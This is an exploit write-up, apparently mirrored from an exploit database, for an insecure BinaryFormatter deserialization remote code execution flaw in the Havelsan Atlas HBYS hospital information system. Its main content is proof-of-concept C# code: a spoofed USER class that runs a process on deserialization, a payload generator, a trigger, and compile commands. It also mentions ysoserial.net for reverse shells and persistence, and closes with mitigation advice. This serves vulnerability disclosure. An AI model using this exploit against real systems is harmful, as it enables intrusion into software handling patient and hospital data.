## https://sploitus.com/exploit?id=PACKETSTORM:190450
# Exploit Title: Havelsan Atlas HBYS - Insecure Deserialization RCE
# Date: 2025-04-14
# Exploit Author: Ahmet Γmit BAYRAM
# Vendor: https://github.com/havelsan/atlas
# Version: latest
# Tested on: Windows 10 - 64bit
# CVE: N/A
## π Havelsan Atlas HBYS (.NET BinaryFormatter Deserialization RCE
Vulnerability Analysis)
### π Application:
- **Project Name**: Havelsan Atlas HBYS β [
https://github.com/havelsan/atlas](https://github.com/havelsan/atlas)
- **Technology**: C# / ASP.NET / .NET Framework
- **Vulnerability Type**: Insecure Deserialization (BinaryFormatter)
- **Affected Class**: `TTObjectClasses.HSBSServis+WebMethods`
- **Vulnerable File**: `HSBSServis.hvl.cs`
- **Vulnerable Method**: `AHB_STOK_GIRISI_GETIRSync`
---
### 1οΈβ£ Vulnerability Discovery
```csharp
public static AHB_STOK_GIRIS_LISTESI AHB_STOK_GIRISI_GETIRSync(Guid siteID,
USER user, DateTime Tarih, bool TarihSpecified)
{
return (AHB_STOK_GIRIS_LISTESI) TTMessageFactory.SyncCall(
siteID,
new Guid("..."),
...,
"TTObjectClasses.HSBSServis+WebMethods, TTObjectClasses",
"AHB_STOK_GIRISI_GETIRSync_ServerSide",
user, Tarih, TarihSpecified
);
}
```
> 𧨠The `user` parameter is passed to the `SyncCall(...)` method, which
internally performs deserialization using **BinaryFormatter**. This allows
arbitrary objects to be loaded and executed, leading to **Remote Code
Execution (RCE)**.
---
### 2οΈβ£ Root Cause of the Vulnerability
`.NET BinaryFormatter` accepts any object that has the same class and
namespace name, even if it originates from a different assembly.
Additionally:
- The deserialization process does not enforce type safety.
- If the attackerβs class implements `IObjectReference`, its
`GetRealObject()` method is **automatically invoked** during
deserialization.
---
### 3οΈβ£ PoC Source Code
---
#### π₯ 3.1 Exploit Class (`USER.cs`)
```csharp
using System;
using System.Diagnostics;
using System.Runtime.Serialization;
[Serializable]
public class USER : IObjectReference
{
public object GetRealObject(StreamingContext context)
{
Console.WriteLine("[!] Exploit triggered!");
Process.Start("calc.exe"); // Code execution occurs here
return this;
}
}
```
---
#### βοΈ 3.2 Payload Generator (`GeneratePayload.cs`)
```csharp
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
public class GeneratePayload
{
public static void Main(string[] args)
{
USER user = new USER();
using (FileStream fs = new FileStream("payload.bin",
FileMode.Create))
{
BinaryFormatter bf = new BinaryFormatter();
bf.Serialize(fs, user);
Console.WriteLine("[+] payload.bin has been created.");
}
}
}
```
---
#### π§ͺ 3.3 Deserialization Trigger (`TestDeserialize.cs`)
```csharp
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
public class TestDeserialize
{
public static void Main(string[] args)
{
Console.WriteLine("[*] Reading payload.bin...");
using (FileStream fs = new FileStream("payload.bin", FileMode.Open))
{
BinaryFormatter bf = new BinaryFormatter();
var user = (USER)bf.Deserialize(fs); // β Trigger occurs here
Console.WriteLine("[+] Deserialization completed
successfully!");
}
}
}
```
---
### 4οΈβ£ Compilation and Exploitation Commands
#### π§ 1. Compile the malicious class as a DLL:
```bash
csc /target:library /out:ExploitLib.dll USER.cs
```
#### π§ 2. Generate the payload:
```bash
csc /reference:ExploitLib.dll /out:GeneratePayload.exe GeneratePayload.cs
GeneratePayload.exe
```
#### π§ 3. Trigger deserialization:
```bash
csc /reference:ExploitLib.dll /out:TestDeserialize.exe TestDeserialize.cs
TestDeserialize.exe
```
β If everything works correctly β **`calc.exe` should be executed**
β This demonstrates a **full Remote Code Execution** scenario.
---
### π₯ How the Vulnerability Was Confirmed
- The `SyncCall(...)` method deserializes the `USER` object coming from an
untrusted source.
- An attacker can craft a fake `USER` class with the same name and
namespace.
- Upon deserialization, the `IObjectReference.GetRealObject()` method is
automatically executed.
- Arbitrary code (e.g., `calc.exe`) was successfully launched.
- Therefore, **full RCE has been proven**.
---
### π Mitigation Recommendations
- Avoid using `BinaryFormatter` completely.
- Instead, use safer alternatives such as:
- `System.Text.Json`
- `DataContractSerializer`
- `XmlSerializer`
- Implement strict type whitelisting for deserialization.
- Avoid using runtime loading APIs like `Assembly.Load`,
`Activator.CreateInstance`, and `MethodInfo.Invoke` on user-supplied data.
---
### π§ͺ Additional Notes
- This vulnerability can be further exploited using `ysoserial.net` to
execute PowerShell, reverse shells, or establish persistence.
- Similar insecure deserialization issues are common in SOAP/WCF and
internal service bus implementations in enterprise .NET environments.
---